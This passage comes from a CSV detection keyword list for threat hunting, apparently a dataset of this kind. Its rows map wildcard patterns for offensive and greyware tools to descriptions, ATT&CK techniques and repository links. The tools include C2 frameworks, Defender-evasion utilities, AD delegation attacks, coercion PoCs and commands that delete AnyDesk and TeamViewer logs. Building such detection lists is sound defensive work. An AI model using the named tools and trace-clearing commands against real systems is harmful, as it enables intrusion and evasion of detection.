used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DefaultBeaconApi*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*DefaultCreds-cheat-sheet*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,1,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*--defaults-torrc*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DefenderCheck*,offensive_tool_keyword,DefenderCheck,Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.,T1027 - T1055 - T1562 - T1553,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/matterpreter/DefenderCheck,1,0,N/A,N/A,10,1918,340,2023-09-14T18:42:39Z,2019-04-09T14:03:46Z -*DefenderCheck.exe*,offensive_tool_keyword,DefenderCheck,Identifies the bytes that Microsoft Defender flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_ExampleModule.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_PeLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_ProcessHandle.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_PythonRunInMem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_SessionClone.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_ProcessInjection_WindowsSystem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DeimosC2*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*deleg_enum_imp*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Delegation/delegation.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*delegation_constrained_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*delegation_constrained_w_protocol_transition_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*delegation_rbcd_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*delegation_unconstrained_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*DelegationBOF.*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*deliver.exe -d -c * -f*.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*deliver.exe -d -f *.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*dementor.py -d * -u * -p *,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,rough PoC to connect to spoolss to elicit machine account authentication,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*demo-bof.cna*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*demo-client.exe *,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*demo-controller.exe *,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Dendrobate-master*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*dendron*FileMonInject.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*deploycaptureserver.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*DeployPrinterNightmare.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*DesertNut.csproj*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*DesertNut.exe*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*DesertNut.sln*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*DesertNut_h.cs*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*-destPipe * -pipeHost * -bindPort *,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*details-c80a6994018b23dc.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*detect ntdll.dll*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*detect-hooksx64.*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*devtunnel create *,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*devtunnel host -p *,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*devtunnel* user login -d*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*devtunnel.exe *,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*dfkdflfgjdajbhocmfjolpjbebdkcjog*,greyware_tool_keyword,Free Avira Phantom VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*dfscoerce.py -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dfscoerce.py*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z -*dfscoerce_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DFSCoerce-main*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 